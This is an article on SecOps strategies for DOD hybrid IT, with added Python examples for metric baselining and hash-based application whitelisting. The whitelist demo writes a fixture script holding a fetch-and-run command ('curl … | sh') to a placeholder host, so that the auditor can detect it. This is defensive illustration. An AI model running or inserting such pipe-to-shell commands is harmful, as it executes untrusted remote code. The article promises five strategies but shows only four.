Five Strategies for Security and Operations Success
Hybrid IT presents SecOps challenges.
The Department of Defense (DOD) has long been at the tip of the spear when it comes to successfully melding IT security and operations (SecOps). Over the past few decades, the DOD has shown consistent leadership through a commitment to bringing security awareness into just about every facet of its operations. The growing popularity of hybrid IT poses a challenge to the DOD’s well-honed approach to SecOps.
An increasing number of public sector agencies are moving at least some of their services and applications to the cloud while continuing to run critical portions of their infrastructure on-site. This migration is driven by a desire for greater agility and cost efficiency, but it is slowed by security concerns: agency teams must come to terms with relinquishing direct control of their data to a third party, and with documenting a system access list when they cannot know everyone who has access behind the cloud provider's infrastructure.
In this new hybrid IT world, it is more important than ever for SecOps teams to work together to maintain the balance between the need for greater speed and efficiencies and solid security. There are many ways to approach this challenge, but here are five strategies teams can employ to help ensure balance and maintain the DOD’s reputation as a model for SecOps success.
Foster an agency-wide commitment to high security standards.
The secure-by-design concept does not just apply to the creation of software; it must be a value shared by workers throughout the agency. Everyone, from the CIO on down, should be trained on the agency’s specific security protocols and committed to upholding the agency’s high security standards.
Additionally, security and operations teams must strengthen the bonds they already have. Hybrid IT environments pose new challenges, and operations managers will need to work closely with information security officers to make quick decisions, based on the criticality of each incident, to mitigate threats. We have all heard the expressions "Security is everyone's responsibility" and "Trust but verify." We need to embrace both in protecting our environments and data.
Establish clear visibility into hybrid IT environments.
Hybrid IT environments are, by their nature, highly distributed, which can make it hard for teams to monitor their data and applications, especially when they are off-site. Consider the possibility that an agency's virtual machine is running on the same physical host as another tenant's VM that is exploiting a CPU side-channel flaw such as Spectre or Meltdown to read memory across the isolation boundary, and that the SecOps team may not even be aware this is happening. (Spectre and Meltdown are hardware vulnerabilities, not viruses; the risk is a co-tenant abusing them, not an infection that spreads.)
Gaining clear visibility into applications and data as they move on- and off-premises is essential, so agencies should employ monitoring capabilities that let SecOps teams watch applications wherever they run. Server and application monitors can also confirm that the intended network boundaries are actually in place and keep tabs on overall application performance for better quality of service. System and application monitors should provide a complete environmental view that shows both recent and historic trends. If systems have not been properly baselined, anomalies will be much harder to notice.
Rely on data to identify potential security holes.
Data is the lifeblood of agency network operations, and SecOps teams can use that mass of information to their advantage. Historical event and network performance data that is already being collected can help identify vulnerabilities in DOD networks.
This requires complete data visualization across all networking components, whether they are on-site or off. Teams should be able to select the metrics of their choice (for example, a date range and network traffic volume) and easily view activity spikes or anomalies in those metrics. A graphical representation of the overlaid data can help pinpoint potential issues that deserve immediate attention.
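The baselining described in the visibility section and the overlaid-metric spike hunting described here come down to the same computation: learn what normal looks like for each metric, then flag later samples that fall outside it, and look for timestamps where more than one metric spikes at once. The following is an added example (not SolarWinds' code and not a product feature) that does this over a constructed set of hourly samples for one host; the metric names, the thresholds (mean plus three standard deviations) and the 18-sample training window are assumptions chosen for illustration.

```python
"""Baseline a host's metrics, then flag later samples that exceed the baseline.

Added example: the samples below are constructed for illustration and are not
real telemetry. The first TRAIN_COUNT samples establish the baseline; the rest
are scored against it.
"""
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# (timestamp, outbound_bytes, failed_logins) -- constructed values.
SAMPLES: List[Tuple[str, int, int]] = [
    ("2023-05-01T00:00", 1_200_000, 2), ("2023-05-01T01:00", 1_150_000, 1),
    ("2023-05-01T02:00", 1_300_000, 3), ("2023-05-01T03:00", 1_250_000, 0),
    ("2023-05-01T04:00", 1_100_000, 2), ("2023-05-01T05:00", 1_350_000, 1),
    ("2023-05-01T06:00", 1_200_000, 2), ("2023-05-01T07:00", 1_280_000, 4),
    ("2023-05-01T08:00", 1_220_000, 1), ("2023-05-01T09:00", 1_310_000, 2),
    ("2023-05-01T10:00", 1_190_000, 3), ("2023-05-01T11:00", 1_260_000, 1),
    ("2023-05-01T12:00", 1_140_000, 0), ("2023-05-01T13:00", 1_330_000, 2),
    ("2023-05-01T14:00", 1_210_000, 1), ("2023-05-01T15:00", 1_270_000, 3),
    ("2023-05-01T16:00", 1_230_000, 2), ("2023-05-01T17:00", 1_290_000, 1),
    # Scored samples: a joint spike at 19:00 and a traffic-only spike at 22:00.
    ("2023-05-01T18:00", 1_240_000, 2), ("2023-05-01T19:00", 9_800_000, 40),
    ("2023-05-01T20:00", 1_300_000, 1), ("2023-05-01T21:00", 1_200_000, 3),
    ("2023-05-01T22:00", 4_500_000, 2), ("2023-05-01T23:00", 1_260_000, 1),
]
TRAIN_COUNT = 18   # assumed size of the baseline window
Z = 3.0            # assumed sensitivity: flag anything above mean + 3 sigma
METRICS = {"outbound_bytes": 1, "failed_logins": 2}  # name -> column index


def baseline(values: List[float], z: float = Z) -> Tuple[float, float]:
    """Return (mean, upper threshold) for one metric's history.

    Uses the population standard deviation; a constant history yields a
    threshold equal to its mean, so any increase at all is flagged.
    """
    m = mean(values)
    return m, m + z * pstdev(values)


def score(samples: List[Tuple[str, int, int]],
          train_count: int = TRAIN_COUNT, z: float = Z) -> Dict[str, List[str]]:
    """Flag post-training samples above each metric's threshold.

    Returns metric name -> timestamps flagged, plus "correlated": timestamps
    at which every metric was flagged simultaneously (the overlaid-graph view).
    """
    flagged: Dict[str, List[str]] = {}
    for name, col in METRICS.items():
        history = [s[col] for s in samples[:train_count]]
        _, upper = baseline(history, z)
        flagged[name] = [s[0] for s in samples[train_count:] if s[col] > upper]
    common = set.intersection(*(set(flagged[n]) for n in METRICS))
    flagged["correlated"] = sorted(common)
    return flagged


if __name__ == "__main__":
    for name, hits in score(SAMPLES).items():
        print(f"{name}: {hits if hits else 'no anomalies'}")
```

The traffic-only spike at 22:00 is reported but is not correlated with a login spike, so it might be a legitimate transfer; the 19:00 event, where outbound traffic and failed logins jump together, is the one the overlaid view is meant to surface. In practice the baseline window should cover at least a full business cycle (per hour-of-day and per weekday) rather than a single day as here.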
Stay patched and create a software inventory whitelist.
Many security holes can be closed simply by keeping software up to date. A patching schedule goes a long way toward covering known security flaws. Automated patch management systems also work well, since they can apply vendor patches for known vulnerabilities as soon as they are released. Regardless of tools or strategy, software should be routinely updated to fortify it against the latest malware and vulnerabilities. Track the release of patches for every product you run, as vendors do not follow a common release schedule or versioning convention. Make certain you have a documented and tested rollout plan: the ease of an automated patch management system can quickly become your biggest nightmare if patches have not been validated before deployment.
SecOps teams should also collaborate on an application whitelist: an inventory of the software that is approved to run. While most government organizations already have a stringent list of approved vendors and regulations around the types of software they may use, hybrid IT has introduced new players into the market, many of which offer innovative and tempting tools. Teams should carefully research the software available to them and create a list of solutions that fit their criteria and agency security parameters. The NIST Guide to Application Whitelisting (SP 800-167) is a good starting point.
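An application whitelist is only enforceable if it identifies each approved binary by something an attacker cannot trivially forge, which is why NIST SP 800-167 recommends file hashes or code signatures over paths or names alone. The following is an added example (not SolarWinds' code and not part of the NIST guide) that snapshots approved binaries by path and SHA-256, then audits a directory and classifies each file as approved, modified in place, or unlisted. The file names and contents in `demo()` are constructed for illustration; `example.invalid` is a reserved placeholder domain, not a real host.

```python
"""Hash-based application whitelist: snapshot approved binaries, then audit.

Added example. An allowlist maps absolute path -> SHA-256 of the approved
content; the audit then distinguishes three cases a SecOps team cares about:
an approved file, a known file whose content changed, and a file nobody approved.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large binaries do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_allowlist(approved: Iterable[Path]) -> Dict[str, str]:
    """Snapshot the approved binaries (e.g. from a golden image) as path -> hash."""
    return {str(p.resolve()): sha256_file(p) for p in approved}


def audit(allowlist: Dict[str, str], candidates: Iterable[Path]) -> Dict[str, List[str]]:
    """Classify each candidate file against the allowlist.

    'approved': path known and hash matches
    'modified': path known but content differs (tampering or an unvetted update)
    'unlisted': path never approved at all
    """
    report: Dict[str, List[str]] = {"approved": [], "modified": [], "unlisted": []}
    for path in candidates:
        key = str(path.resolve())
        if key not in allowlist:
            report["unlisted"].append(key)
        elif allowlist[key] != sha256_file(path):
            report["modified"].append(key)
        else:
            report["approved"].append(key)
    return report


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: approve two scripts, tamper with one, drop in a stray binary.

    Returns the audit report with paths reduced to file names so the result is
    independent of the temporary directory location.
    """
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = Path(tmp) / "bin"
        bin_dir.mkdir()
        backup = bin_dir / "backup.sh"
        rotate = bin_dir / "rotate.sh"
        backup.write_bytes(b"#!/bin/sh\ntar czf /srv/backup.tgz /srv/data\n")
        rotate.write_bytes(b"#!/bin/sh\nlogrotate /etc/logrotate.conf\n")
        allowlist = build_allowlist([backup, rotate])

        # After the snapshot: rotate.sh is replaced (constructed tampering) and
        # an unapproved file appears alongside the approved tools.
        rotate.write_bytes(b"#!/bin/sh\ncurl http://example.invalid/x | sh\n")
        stray = bin_dir / "helper.bin"
        stray.write_bytes(b"\x7fELF constructed placeholder, not a real binary\n")

        report = audit(allowlist, sorted(bin_dir.iterdir()))
        return {kind: [Path(p).name for p in paths] for kind, paths in report.items()}


if __name__ == "__main__":
    for kind, names in demo().items():
        print(f"{kind}: {names}")
```

Keying the allowlist by path as well as hash is what makes the "modified" class possible; a hash-only allowlist would report the tampered script simply as unknown. Either way, the snapshot must be rebuilt as part of the patch rollout plan, otherwise every legitimate update shows up as tampering.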
Hybrid IT is challenging the DOD to up its admirable SecOps game. The organization will need to make some strategic adjustments to overcome the challenges that hybrid IT poses, but doing so will undoubtedly yield beneficial results. Agencies will be able to reap the many benefits of hybrid IT while also improving their security postures. That is a win/win for both security and operations teams.
Paul Parker is chief technologist, federal and national government, at SolarWinds.